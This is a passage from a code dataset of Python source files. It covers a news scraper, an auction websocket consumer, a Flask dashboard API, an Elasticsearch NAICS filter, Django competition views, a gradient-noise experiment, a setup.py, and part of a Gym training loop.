callback=self.parse_url)\n def parse_url(self, response):\n list_url = response.css(\"h3.title_news a::attr(href)\").extract()\n del list_url[1::2]\n # print (list_url)\n time.sleep(5)\n for sub_url in list_url:\n if(self.arc_count<2000):\n yield scrapy.Request(url=sub_url, callback=self.parse_arc)\n else:\n pass\n # yield scrapy.Request(url=list_url[0], callback=self.parse_arc)\n\n def parse_arc(self, response):\n self.arc_count+=1\n ts=str(time.time())+str(self.arc_count)\n\n url=response.url\n\n title = response.css(\"h1.title_news_detail::text\").extract()\n\n print(\"======>\")\n # pr\n if(len(title)!=0):\n title = title[0]\n\n text=\"\"\n article=response.css(\"article.content_detail p\")\n for p in article:\n t1=p.css(\"p::text\").extract()\n for txt in t1:\n text=text+txt\n sp1=p.css(\"span::text\").extract()\n for txt in sp1:\n text=text+txt\n\n content={\"id\":ts,\"origin\":\"8\",\"url\":url,\"title\":title,\"content\":text}\n self.contents.append(content);\n if (self.arc_count % 10==0):\n self.solr.add(self.contents)\n self.contents=[]\n else:\n pass\n # print(\"text===========>\")\n # print (text)\n # print(\"text===========>\")\n","sub_path":"vnexpress.py","file_name":"vnexpress.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"398049919","text":"from django.contrib.auth import get_user_model\nfrom asgiref.sync import async_to_sync\nfrom channels.generic.websocket import WebsocketConsumer\nimport json\nimport requests\nfrom datetime import timedelta\nfrom datetime import datetime\nUser = get_user_model()\nURL_BASE = \"http://172.17.0.3:5000/\"\n\nclass ChatConsumer(WebsocketConsumer):\n def fetch_messages(self, data):\n room_name = int(data['auction_id'])\n r = requests.get(URL_BASE +\n \"auction/get-auction-history?item_id={}\".format(room_name))\n if r is None:\n return\n r_dict = r.json()\n print(\"DEBUG: AUCTION HISTORY {}\".format(r_dict))\n auction_list = r_dict[\"auction_list\"]\n messages = []\n for auction_record in auction_list:\n buyer_id = int(auction_record[\"auction_user_id\"])\n res = requests.post(URL_BASE + \"login/get-account-info\",\n json={\"account_id\": buyer_id})\n if res is None:\n continue\n buyer_dict = res.json()\n if \"first_name\" not in buyer_dict:\n return \n price = auction_record[\"auction_price\"]\n auction_time = int(auction_record[\"auction_time\"])\n time_stamp = datetime.fromtimestamp(auction_time)\n messages.append({\"price\": price,\n \"time_stamp\": time_stamp,\n \"buyer\": {\n \"id\": buyer_id,\n \"first_name\": buyer_dict[\"first_name\"],\n \"last_name\": buyer_dict[\"last_name\"],\n }})\n print(messages)\n content = {\n 'messages': self.messages_to_json(messages),\n 'command': 'messages'\n }\n self.send_message(content)\n pass\n\n def new_message(self, data):\n sender_id = int(data['from'])\n auction_id = int(data['auction_id'])\n price = int(float(data['price']))\n r = requests.post(URL_BASE + \"login/get-account-info\",\n json={\"account_id\": sender_id})\n if r is None:\n return print(\"new message seller is invalid\")\n r_dict = r.json()\n first_name = r_dict[\"first_name\"]\n last_name = r_dict[\"last_name\"]\n sender = {\n \"id\": sender_id,\n \"first_name\": first_name,\n \"last_name\": last_name\n }\n message = {\n \"buyer\": sender,\n \"price\": price,\n \"time_stamp\": datetime.now()\n }\n res = requests.post(URL_BASE + \"auction/bid-item\",\n json = {\"auction_price\": int(price),\n \"auction_user_id\": sender_id,\n \"item_id\": auction_id})\n if res is None:\n print(\"DEBUG: BID ITEM FAILED\")\n return\n content = {\n 'command': 'new_message',\n 'message': self.message_to_json(message)\n }\n return self.send_chat_message(content)\n\n def fetch_items(self, data):\n sender_id = int(data['from'])\n res = requests.get(URL_BASE +\n \"shopping-cart/list-user-shopping-cart-items\" +\n \"?user_id={}\".format(sender_id))\n if res is None:\n return\n res_dict = res.json()\n items = []\n if type(res_dict) is dict:\n items = self.items_to_json(res_dict[\"item_list\"])\n content = {\n 'items': items,\n 'command': 'items'\n }\n self.send_message(content)\n\n def new_item(self, data):\n sender_id = int(data['from'])\n item_id = int(data['auction_id'])\n content = {\n 'command': 'new_item',\n 'item': self.item_to_json(item_id),\n 'from': sender_id\n }\n return self.send_chat_message(content)\n\n def messages_to_json(self, messages):\n result = []\n for message in messages:\n result.append(self.message_to_json(message))\n return result\n\n def message_to_json(self, message):\n return {\n 'id': message[\"buyer\"][\"id\"],\n 'sender': message[\"buyer\"][\"first_name\"] + \" \" + message[\"buyer\"][\"last_name\"],\n 'profile_image': \"/media/profile_images/profilepic.jpg\",\n 'price': message[\"price\"],\n 'timestamp': str(message[\"time_stamp\"].strftime('%Y-%m-%d %H:%M:%S')),\n }\n\n def items_to_json(self, item_ids):\n result = []\n for item_id in item_ids:\n result.append(self.item_to_json(item_id))\n return result\n\n def item_to_json(self, item_id):\n res = requests.post(URL_BASE + \"item/get-item-info\",\n json={\"item_id\": item_id})\n if res is None:\n print(\"ERROR: ITEM ID is invalid.\")\n return {}\n res_dict = res.json()\n return {\n 'name': res_dict.get(\"item_name\"),\n 'item_image': res_dict.get(\"image_url\"),\n 'price': res_dict.get(\"current_auction_price\"),\n }\n\n commands = {\n 'fetch_messages': fetch_messages,\n 'new_message': new_message,\n 'fetch_items': fetch_items,\n 'new_item': new_item,\n }\n\n def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_name']\n self.room_group_name = 'chat_%s' % self.room_name\n\n async_to_sync(self.channel_layer.group_add)(\n self.room_group_name,\n self.channel_name\n )\n\n self.accept()\n\n def disconnect(self, close_code):\n async_to_sync(self.channel_layer.group_discard)(\n self.room_group_name,\n self.channel_name\n )\n\n def receive(self, text_data):\n data = json.loads(text_data)\n print(data)\n if data['command'] in self.commands:\n self.commands[data['command']](self, data)\n\n def send_chat_message(self, message):\n async_to_sync(self.channel_layer.group_send)(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message\n }\n )\n\n def send_message(self, message):\n self.send(text_data=json.dumps(message))\n\n def chat_message(self, event):\n message = event['message']\n self.send(text_data=json.dumps(message))\n","sub_path":"webserver/auctionApp/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":6410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"128093447","text":"from flask import Blueprint, request\nfrom flask.json import jsonify\nfrom SQL import get_number_confirmed_bans, get_number_tracked_players, get_report_stats, get_region_report_stats\n\ndashboard = Blueprint('dashboard', __name__, template_folder='templates')\n\n#######################\n# Dashboard Endpoints #\n#######################\n\n\n@dashboard.route('/site/dashboard/gettotaltrackedplayers', methods=['GET'])\ndef get_total_tracked_players():\n num_of_players = get_number_tracked_players()\n return_dict = {\n \"players\": num_of_players[0]\n }\n\n return jsonify(return_dict)\n\n\n@dashboard.route('/site/dashboard/getreportsstats', methods=['GET'])\ndef get_total_reports():\n report_stats = get_report_stats()[0]\n\n return_dict = {\n \"bans\": int(report_stats[0]),\n \"false_reports\": int(report_stats[1]),\n \"total_reports\": int(report_stats[2]),\n \"accuracy\": float(report_stats[3])\n }\n\n return return_dict\n\n@dashboard.route('/site/dashboard/getregionstats', methods=['GET'])\ndef get_region_reports():\n region_stats = get_region_report_stats()\n\n print(region_stats)\n print(type(region_stats))\n\n return 'OK'\n\n\n\n# CORS Policy: Allow Access to These Methods From Any Origin\n@dashboard.after_request\ndef after_request(response):\n header = response.headers\n header['Access-Control-Allow-Origin'] = '*'\n return response\n","sub_path":"mysite/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"623726009","text":"from usaspending_api.common.exceptions import InvalidParameterException\nfrom usaspending_api.search.elasticsearch.filters.filter import _Filter, _QueryType\nfrom elasticsearch_dsl import Q as ES_Q\n\n\nclass NaicsCodes(_Filter):\n underscore_name = \"naics_codes\"\n\n @classmethod\n def generate_elasticsearch_query(cls, filter_values, query_type: _QueryType) -> ES_Q:\n # legacy functionality permits sending a single list of naics codes, which is treated as the required list\n if isinstance(filter_values, list):\n require = filter_values\n exclude = []\n elif isinstance(filter_values, dict):\n require = filter_values.get(\"require\") or []\n exclude = filter_values.get(\"exclude\") or []\n else:\n raise InvalidParameterException(f\"naics_codes must be an array or object\")\n\n if [value for value in require if len(str(value)) not in [2, 4, 6]] or [\n value for value in exclude if len(str(value)) not in [2, 4, 6]\n ]:\n raise InvalidParameterException(\"naics code filtering only supported for codes with lengths of 2, 4, and 6\")\n\n requires = [str(code) for code in require]\n exclude = [str(code) for code in exclude]\n\n return ES_Q(\"query_string\", query=cls._query_string(requires, exclude), default_field=\"naics_code.keyword\")\n\n @classmethod\n def _query_string(cls, require, exclude) -> str:\n \"\"\"Generates string in proper syntax for Elasticsearch query_string attribute, given API parameters\"\"\"\n positive_codes, negative_codes = cls._order_naics_codes(require, exclude, require + exclude)\n\n positive_nodes = [\n _NaicsNode(code, True, positive_codes[\"sub\"], negative_codes[\"sub\"]) for code in positive_codes[\"top\"]\n ]\n negative_nodes = [\n _NaicsNode(code, False, positive_codes[\"sub\"], negative_codes[\"sub\"]) for code in negative_codes[\"top\"]\n ]\n\n positive_query = \" OR \".join([node.get_query() for node in positive_nodes])\n negative_query = \" AND \".join([node.get_query() for node in negative_nodes])\n\n if positive_query and negative_query:\n return f\"{positive_query} AND {negative_query}\"\n else:\n return positive_query + negative_query # We know that exactly one is blank thanks to TinyShield\n\n @staticmethod\n def _order_naics_codes(requires, exclude, all_codes):\n \"\"\"Seperates NAICS codes into 'top' codes (those with no higher node in either array), and 'sub' codes (those that do).\"\"\"\n postive_codes = {\n \"top\": [code for code in requires if len([root for root in all_codes if code[:-1].startswith(root)]) == 0]\n }\n negative_codes = {\n \"top\": [code for code in exclude if len([root for root in all_codes if code[:-1].startswith(root)]) == 0]\n }\n postive_codes[\"sub\"] = [code for code in requires if code not in postive_codes[\"top\"] + negative_codes[\"top\"]]\n negative_codes[\"sub\"] = [code for code in exclude if code not in postive_codes[\"top\"] + negative_codes[\"top\"]]\n\n return postive_codes, negative_codes\n\n\nclass _NaicsNode:\n \"\"\"Represents one part of the final query, either requiring or excluding one NAICS code, with any exceptions\"\"\"\n\n code: str\n positive: bool\n children: list\n\n def __init__(self, code, positive, positive_naics, negative_naics):\n self.code = code\n self.positive = positive\n self.populate_children(positive_naics, negative_naics)\n\n def populate_children(self, positive_naics, negative_naics):\n self.children = []\n self._pop_children_helper(positive_naics, True, positive_naics, negative_naics)\n self._pop_children_helper(negative_naics, False, positive_naics, negative_naics)\n\n def _pop_children_helper(self, codes, is_positive, positive_naics, negative_naics):\n for other_code in codes:\n if len(other_code) == len(self.code) + 2 and other_code[: len(self.code)] == self.code:\n self.children.append(_NaicsNode(other_code, is_positive, positive_naics, negative_naics))\n\n def get_query(self):\n retval = f\"{self.code}\"\n if len(self.code) < 6:\n retval += \"*\"\n if not self.positive:\n retval = f\"NOT {retval}\"\n retval = f\"({retval})\"\n\n positive_child_query = \" OR \".join([child.get_query() for child in self.children if child.positive])\n negative_child_query = \" AND \".join([child.get_query() for child in self.children if not child.positive])\n joined_child_query = \" AND \".join(query for query in [positive_child_query, negative_child_query] if query)\n\n if self.children:\n if self.positive:\n retval += f\" AND ({joined_child_query})\"\n else:\n retval += f\" OR ({joined_child_query})\"\n\n return f\"({retval})\"\n","sub_path":"usaspending_api/search/elasticsearch/filters/naics.py","file_name":"naics.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"135135076","text":"from django.contrib.auth.models import User\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.generic.list import ListView\nfrom django.views.generic import CreateView, FormView, DetailView\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\n\nfrom .forms import (\n NewCompetitionForm,\n NewEventForm,\n RegistrationForm,\n CompetitionConfigForm,\n)\nfrom .models import Competition, Event\n\nfrom organizations.models import Organization, OrganizationEvent, AgeDivision, Level\nfrom competitions.models import Event\n\n\nclass CompetitionListView(ListView):\n model = Competition\n template_name = \"competitions.html\"\n context_object_name = \"competitions\"\n\n def get_queryset(self):\n return Competition.objects.all().filter(status=\"PUBLISHED\")\n\n\nclass CompetitionManagerView(PermissionRequiredMixin, ListView):\n permission_required = \"competitions.is_competition_coordinator\"\n model = Competition\n context_object_name = \"my_competitions\"\n template_name = \"competitions_manage.html\"\n\n def get_queryset(self):\n current_user = self.request.user\n return Competition.objects.all().filter(creator=current_user)\n\nclass CompetitionDetailView(DetailView):\n model = Competition\n context_object_name = \"competition\"\n\nclass CompetitionDetailAboutView(CompetitionDetailView):\n template_name = \"competition_detail_about.html\"\n\nclass CompetitionDetailEventsView(CompetitionDetailView):\n template_name = \"competition_detail_events.html\"\n\n def get_context_data(self, *args, **kwargs):\n context = super(CompetitionDetailEventsView, self).get_context_data()\n user = self.request.user\n competition = get_object_or_404(Competition, pk=self.kwargs['pk'])\n context[\"other_events\"] = Event.objects.filter(competition=competition).exclude(athletes=user)\n context[\"my_events\"] = Event.objects.filter(competition=competition, athletes=user)\n return context\n\nclass CompetitionDetailFAQsView(CompetitionDetailView):\n template_name = \"competition_detail_faqs.html\"\n\n\nclass CompetitionCreateView(CreateView):\n model = Competition\n template_name = \"new_competition.html\"\n fields = [\n \"title\",\n \"organization\",\n \"tier\",\n \"description\",\n \"location\",\n \"start_date\",\n \"end_date\",\n ]\n\n def get_success_url(self, **kwargs):\n print(self.object.pk)\n return reverse_lazy(\"new_competition_config\", kwargs={\"pk\": self.object.pk})\n\n def form_valid(self, form):\n form.instance.creator = self.request.user\n self.object = form.save()\n organization = get_object_or_404(Organization, pk=self.object.organization.pk)\n return super().form_valid(form)\n\n\nclass CompetitionConfigView(FormView):\n form_class = CompetitionConfigForm\n template_name = \"new_competition_config.html\"\n context_object_name = \"competition\"\n\n def get_success_url(self, **kwargs):\n return reverse_lazy(\"manage_competitions\")\n\n def get_form_kwargs(self):\n competition = get_object_or_404(Competition, pk=self.kwargs[\"pk\"])\n organization = get_object_or_404(Organization, pk=competition.organization.pk)\n kwargs = super().get_form_kwargs()\n kwargs.update({\"organization\": organization})\n return kwargs\n\n def post(self, request, *args, **kwargs):\n competition = get_object_or_404(Competition, pk=kwargs[\"pk\"])\n form = self.get_form()\n if form.is_valid():\n event_types = form.cleaned_data[\"event_types\"]\n levels = form.cleaned_data[\"levels\"]\n min_age_divisions = form.cleaned_data[\"age_divisions\"]\n include_open_events = form.cleaned_data[\"open_events\"]\n include_visitor_events = form.cleaned_data[\"visitor_events\"]\n title_event_entry_fee = form.cleaned_data[\"title_entry_fee\"]\n open_event_entry_fee = form.cleaned_data[\"open_entry_fee\"]\n visitor_event_entry_fee = form.cleaned_data[\"visitor_entry_fee\"]\n event_tuples = []\n print(\"open events value: \", include_open_events)\n for event in event_types:\n for level in levels:\n print(level)\n organization_level = get_object_or_404(Level,\n organization=competition.organization,\n name__exact=level\n )\n print(organization_level)\n for division in min_age_divisions:\n organization_age_division = get_object_or_404(AgeDivision, \n organization=competition.organization,\n age_min=division\n )\n age_max = organization_age_division.age_max or 0\n event_dict = {\n \"event\": event, \n \"level\": organization_level, \n \"age_min\": division,\n \"age_max\": age_max,\n \"registration_fee\": title_event_entry_fee,\n \"category\": \"TITLE\"\n }\n if \"Men's\" in event:\n event_dict[\"gender\"] = \"MALE\"\n else:\n event_dict[\"gender\"] = \"FEMALE\"\n event_tuples.append(event_dict)\n\n if include_open_events:\n open_copy = event_dict.copy()\n open_copy[\"category\"] = \"OPEN\"\n open_copy[\"registration_fee\"] = open_event_entry_fee\n event_tuples.append(open_copy)\n \n if include_visitor_events:\n visitor_copy = event_dict.copy()\n visitor_copy[\"category\"] = \"VISITOR\"\n visitor_copy[\"registration_fee\"] = visitor_event_entry_fee\n event_tuples.append(visitor_copy)\n for tup in event_tuples:\n try:\n Event.objects.create_event(\n tup[\"event\"],\n competition,\n tup[\"level\"],\n tup[\"age_min\"],\n tup[\"age_max\"],\n tup[\"gender\"],\n tup[\"registration_fee\"],\n tup[\"category\"],\n )\n except Exception as e:\n print(\"ERROR: \", e)\n pass\n form = self.get_form()\n return self.form_valid(form)\n else:\n return self.form_invalid(form)\n\n\ndef edit_competition(request, pk):\n template = \"new_competition.html\"\n competition = get_object_or_404(Competition, pk=pk)\n\n if request.method == \"POST\":\n form = NewCompetitionForm(request.POST, instance=competition)\n\n try:\n if form.is_valid():\n form.save()\n # messages.success(request, 'Your event has been updated.')\n return redirect(\"manage_competitions\")\n except Exception as e:\n # messages.warning(request, 'Your event was not saved due to an error: {}'.format(e))\n print(e)\n\n else:\n form = NewCompetitionForm(instance=competition)\n\n context = {\"form\": form, \"competition\": competition}\n\n return render(request, template, context)\n\nclass CompetitionManageEventsView(DetailView):\n model = Competition\n template_name = \"competitions_manage_events.html\"\n\n\n def get_context_data(self, *args, **kwargs):\n \n def event_type_finder(event):\n return event.event_type\n\n context = super(CompetitionManageEventsView, self).get_context_data()\n competition = get_object_or_404(Competition, pk=self.kwargs['pk'])\n events = competition.events.all()\n all_event_types = map(event_type_finder, events)\n unique_event_types = set(all_event_types)\n \n event_type_objects = []\n for event_type in unique_event_types:\n obj = { \"name\": event_type, \"levels\": [] }\n unique_levels = set(map(lambda x: x.level, events.filter(event_type=event_type)))\n for level in unique_levels:\n obj[\"levels\"].append({\n \"name\": level,\n \"age_divisions\": set(\n map(lambda x: x.age_division, \n events.filter(\n event_type=event_type, \n level=level\n )\n )\n )\n })\n event_type_objects.append(obj)\n context[\"event_types\"] = event_type_objects\n return context\n\n\ndef delete_competition(request, pk):\n competition = get_object_or_404(Competition, pk=pk)\n competition.delete()\n\n return redirect(\"manage_competitions\")\n\n\ndef new_event(request, pk):\n template = \"new_event.html\"\n\n competition = get_object_or_404(Competition, pk=pk)\n\n if request.method == \"POST\":\n form = NewEventForm(request.POST)\n if form.is_valid():\n event = Event.objects.create(\n type=form.cleaned_data.get(\"type\"),\n competition=Competition.objects.get(pk=pk),\n lane=form.cleaned_data.get(\"lane\"),\n gender=form.cleaned_data.get(\"gender\"),\n level=form.cleaned_data.get(\"level\"),\n age=form.cleaned_data.get(\"age\"),\n )\n event.judges.set(form.cleaned_data.get(\"judges\"))\n event.clerks.set(form.cleaned_data.get(\"clerks\"))\n event.athletes.set(form.cleaned_data.get(\"athletes\"))\n return redirect(\"competition_detail_events\", pk=pk)\n else:\n form = NewEventForm()\n\n context = {\"form\": form, \"competition\": competition}\n\n return render(request, template, context)\n\n\ndef edit_event(request, pk, event_pk):\n template = \"new_event.html\"\n competition = get_object_or_404(Competition, pk=pk)\n event = get_object_or_404(Event, pk=event_pk)\n\n if request.method == \"POST\":\n form = NewEventForm(request.POST, instance=event)\n\n try:\n if form.is_valid():\n form.save()\n # messages.success(request, 'Your event has been updated.')\n return redirect(\"competition_detail_events\", pk=competition.pk)\n except Exception as e:\n # messages.warning(request, 'Your event was not saved due to an error: {}'.format(e))\n print(e)\n\n else:\n form = NewEventForm(instance=event)\n\n context = {\"form\": form, \"competition\": competition, \"event\": event}\n\n return render(request, template, context)\n\n\ndef delete_event(request, pk, event_pk):\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n twirlingEvent.delete()\n\n return redirect(\"competition_detail_events\", pk=pk)\n\n\ndef event_detail(request, pk, event_pk):\n template = \"event_detail.html\"\n\n competition = get_object_or_404(Competition, pk=pk)\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n\n context = {\"competition\": competition, \"event\": twirlingEvent}\n\n return render(request, template, context)\n\n\ndef register_for_event(request, pk, event_pk):\n user = request.user\n competition = get_object_or_404(Competition, pk=pk)\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n\n twirlingEvent.athletes.add(user)\n twirlingEvent.save()\n\n return redirect(\"event_detail\", pk=pk, event_pk=event_pk)\n\n\ndef unregister_for_event(request, pk, event_pk):\n user = request.user\n competition = get_object_or_404(Competition, pk=pk)\n twirlingEvent = get_object_or_404(Event, pk=event_pk)\n\n twirlingEvent.athletes.remove(user)\n twirlingEvent.save()\n\n return redirect(\"event_detail\", pk=pk, event_pk=event_pk)\n\n\ndef unregister_from_competition(request, pk):\n user = request.user\n competition = get_object_or_404(Competition, pk=pk)\n allCompetitionEvents = Event.objects.all().filter(competition=competition)\n for event in allCompetitionEvents:\n if user in event.athletes.all():\n event.athletes.remove(user)\n event.save()\n\n competition.registered_athletes.remove(user.profile)\n competition.save()\n\n return redirect(\"competition_detail_about\", pk=pk)\n\n\ndef register_for_competition(request, pk):\n template = \"register_for_competition.html\"\n competition = get_object_or_404(Competition, pk=pk)\n\n if request.method == \"POST\":\n form = RegistrationForm(competition, request.POST)\n user = request.user\n\n try:\n if form.is_valid():\n user.profile.registeredCompetitions.add(competition)\n user.save()\n selectedEvents = form.cleaned_data[\"events\"]\n for event in selectedEvents:\n eventObj = get_object_or_404(Event, pk=event.id)\n eventObj.athletes.add(user)\n eventObj.save()\n # form.save()\n # messages.success(request, 'Your event has been updated.')\n return redirect(\"competition_detail_events\", pk=competition.pk)\n except Exception as e:\n # messages.warning(request, 'Your event was not saved due to an error: {}'.format(e))\n print(e)\n\n else:\n form = RegistrationForm(competition)\n\n context = {\"form\": form, \"competition\": competition}\n\n return render(request, template, context)\n","sub_path":"competitions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567753450","text":"import pandas as pd\nimport numpy as np\nimport torch\nfrom boardlaw.main import mix, half, as_chunk\nfrom pavlov import storage\nfrom rebar import arrdict\nfrom logging import getLogger\nfrom boardlaw.hex import Hex\nfrom boardlaw.mcts import MCTSAgent\n\nlog = getLogger(__name__)\n\ndef optimize(network, scaler, opt, batch):\n\n with torch.cuda.amp.autocast():\n d0 = batch.decisions\n d = network(batch.worlds)\n\n zeros = torch.zeros_like(d.logits)\n l = d.logits.where(d.logits > -np.inf, zeros)\n l0 = d0.logits.float().where(d0.logits > -np.inf, zeros)\n\n policy_loss = -(l0.exp()*l).sum(axis=-1).mean()\n\n target_value = batch.reward_to_go\n value_loss = (target_value - d.v).square().mean()\n\n loss = policy_loss + value_loss\n\n opt.zero_grad()\n scaler.scale(loss).backward()\n old = {k: v.detach().clone() for k, v in network.state_dict().items()}\n scaler.step(opt)\n scaler.update()\n network.load_state_dict(old)\n\ndef gradients(run, i, n_envs=16*1024, buffer_len=64, device='cuda'):\n\n #TODO: Restore league and sched when you go back to large boards\n worlds = mix(Hex.initial(n_envs, device=device))\n network = storage.load_raw(run, 'model')\n agent = MCTSAgent(network)\n\n opt = torch.optim.Adam(network.parameters(), lr=0., amsgrad=True)\n scaler = torch.cuda.amp.GradScaler()\n\n sd = storage.load_snapshot(run, i)\n agent.load_state_dict(sd['agent'])\n opt.load_state_dict(sd['opt'])\n scaler.load_state_dict(sd['scaler'])\n\n buffer = []\n\n idxs = (torch.randint(buffer_len, (n_envs,), device=device), torch.arange(n_envs, device=device))\n while True:\n\n # Collect experience\n while len(buffer) < buffer_len:\n with torch.no_grad():\n decisions = agent(worlds, value=True)\n new_worlds, transition = worlds.step(decisions.actions)\n\n buffer.append(arrdict.arrdict(\n worlds=worlds,\n decisions=decisions.half(),\n transitions=half(transition)).detach())\n\n worlds = new_worlds\n\n log.info(f'({len(buffer)}/{buffer_len}) actor stepped')\n\n # Optimize\n chunk, buffer = as_chunk(buffer, n_envs)\n optimize(network, scaler, opt, chunk[idxs])\n log.info('learner stepped')\n\n yield torch.cat([p.grad.flatten() for p in network.parameters() if p.grad is not None])\n\ndef official_way(gs, Bsmall):\n Gbig2 = gs.mean(0).pow(2).mean()\n Gsmall2 = gs.pow(2).mean(1).mean()\n\n Bbig = gs.size(0)*Bsmall\n\n G2 = 1/(Bbig - Bsmall)*(Bbig*Gbig2 - Bsmall*Gsmall2)\n S = 1/(1/Bsmall - 1/Bbig)*(Gsmall2 - Gbig2)\n\n return arrdict.arrdict(S=S, G2=G2, B=(S/G2)).item()\n\ndef sensible_way(gs, Bsmall):\n S = Bsmall*(gs - gs.mean(0, keepdims=True)).pow(2).mean()\n G2 = gs.mean(0).pow(2).mean()\n return arrdict.arrdict(S=S, G2=G2, B=(S/G2)).item()\n\ndef adam_way(run, i, Bsmall):\n sd = storage.load_snapshot(run, i)\n beta1, beta2 = sd['opt']['param_groups'][0]['betas']\n step = sd['opt']['state'][0]['step']\n\n m_bias = 1 - beta1**step\n v_bias = 1 - beta2**step\n\n opt = sd['opt']['state']\n m = 1/m_bias*torch.cat([s['exp_avg'].flatten() for s in opt.values()])\n v = 1/v_bias*torch.cat([s['exp_avg_sq'].flatten() for s in opt.values()])\n\n # Follows from chasing the var through the defn of m\n inflator = (1 - beta1**2)/(1 - beta1)**2\n\n S = Bsmall*(v.mean() - m.pow(2).mean())\n G2 = inflator*m.pow(2).mean()\n\n return arrdict.arrdict(\n S=S, G2=G2, B=(S/G2), \n v=v.mean(),\n m=m.mean(),\n m2=m.pow(2).mean(),\n step=torch.as_tensor(step)).item()\n\ndef run():\n run, idx = '*that-man', -1\n B = 16*1024\n\n gs = []\n for _, g in zip(range(32), gradients(run, idx)):\n log.info(f'{len(gs)} gradients')\n gs.append(g)\n gs = torch.stack(gs).cpu()\n\n # official 27668.0\n # sensible 25460.0\n # adam 20961.0\n stats = pd.DataFrame(dict(\n official=official_way(gs, B),\n sensible=sensible_way(gs, B),\n adam=adam_way(run, -1, B)))\n\ndef adam_over_time(run, B):\n import matplotlib.pyplot as plt\n from tqdm.auto import tqdm\n sizes = arrdict.stack([adam_way(run, idx, B) for idx in tqdm(storage.snapshots(run))])\n plt.plot(sizes)\n\n ","sub_path":"experiments/gradnoise.py","file_name":"gradnoise.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"161118746","text":"from setuptools import setup, find_packages\n\n# get required packages for the Pipfile or requirements file\ntry:\n from pipenv.project import Project\n from pipenv.utils import convert_deps_to_pip\n\n pfile = Project().parsed_pipfile\n requirements = convert_deps_to_pip(pfile['packages'], r=False)\n test_requirements = convert_deps_to_pip(pfile['dev-packages'], r=False)\nexcept ImportError:\n # get the requirements from the requirements.txt\n requirements = [line.strip()\n for line in open('requirements/prod.txt').readlines()\n if line.strip() and not line.startswith('#')]\n # get the test requirements from the test_requirements.txt\n test_requirements = [line.strip()\n for line in\n open('requirements/dev.txt').readlines()\n if line.strip() and not line.startswith('#')]\n\n# get the version\nwith open('{{cookiecutter.app_name}}/__init__.py', 'r') as f:\n for line in f:\n if line.startswith('__version__'):\n version = line.strip().split('=')[-1].strip(' \\'\"')\n break\n else:\n version = '0.0.1'\n\nBUILD_REQUIRED_FILES = (\n 'LICENSE',\n 'AUTHORS.rst',\n 'CONTRIBUTING.rst',\n 'HISTORY.rst',\n 'README.md',\n 'Pipfile',\n 'Pipfile.lock',\n 'requirements/prod.txt',\n 'requirements/dev.txt'\n)\n\nreadme = open('README.md').read()\nhistory = open('HISTORY.rst').read().replace('.. :changelog:', '')\n\nsetup(\n name='{{cookiecutter.app_name}}',\n version=version,\n description='{{cookiecutter.project_short_description}}',\n long_description=readme,\n url='''https//github.com/Eventador/{{ cookiecutter.app_name }}''',\n packages=find_packages(where='.', exclude=['tests']),\n package_dir={'''{{ cookiecutter.app_name }}''': '''{{ cookiecutter.app_name }}'''},\n include_package_data=True,\n install_requires=requirements,\n zip_safe=False,\n\n test_suite='pytest',\n tests_require=test_requirements,\n data_files=[('', BUILD_REQUIRED_FILES)],\n\n entry_points={\n 'console_scripts': [\n '{{cookiecutter.app_name}} = {{cookiecutter.app_name}}.manage:cli'\n ]\n }\n)\n","sub_path":"{{cookiecutter.app_name}}/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474173086","text":"import tensorflow as tf\nimport gym\nfrom gym.spaces import Discrete, Box\nimport pybullet_envs\nimport numpy as np\nimport sys\nimport datetime\nfrom matplotlib import pyplot as plt\n\nfrom Algorithms.REINFORCE import REINFORCE\nfrom Algorithms.VPG import VPG\nfrom Algorithms.TRPO import TRPO\nfrom Algorithms.PPO import PPO\n\nfrom Algorithms.DQN import DQN\nfrom Algorithms.DDQN import DDQN\nfrom Algorithms.Dueling_DQN import Dueling_DQN\n\nfrom Algorithms.DDPG import DDPG\nfrom Algorithms.TD3 import TD3\nfrom Algorithms.SAC_v1 import SAC_v1\nfrom Algorithms.SAC_v2 import SAC_v2\n\nfrom Networks.Atari_Network import Atari_Actor, Atari_V_network\n\nnp.set_printoptions(threshold=sys.maxsize)\n\nclass Gym_trainer:\n def __init__(self, env, algorithm, max_action, min_action, train_mode, render=True, max_episode = 1e6):\n self.env = env\n self.algorithm = algorithm\n\n self.max_action = max_action\n self.min_action = min_action\n\n self.render = render\n self.max_episode = max_episode\n\n self.episode = 0\n self.episode_reward = 0\n self.total_step = 0\n self.local_step = 0\n\n if train_mode == 'offline':\n self.train_mode = self.offline_train\n elif train_mode == 'online':\n self.train_mode = self.online_train\n elif train_mode == 'batch':\n self.train_mode = self.batch_train\n\n def offline_train(self, d, local_step):\n if d:\n return True\n return False\n\n def online_train(self, d, local_step):\n return True\n\n def batch_train(self, d, local_step):#VPG, TRPO, PPO only\n if d or local_step == self.algorithm.batch_size:\n return True\n return False\n\n\n\n def run(self):\n\n while True:\n if self.episode > self.max_episode:\n print(\"Training finished\")\n break\n\n self.episode += 1\n self.episode_reward = 0\n self.local_step = 0\n\n observation = self.env.reset()\n #observation = np.array(observation, dtype='float32')\n observation = tf.image.rgb_to_grayscale(tf.image.resize(np.array(self.env.render(mode='rgb_array'), 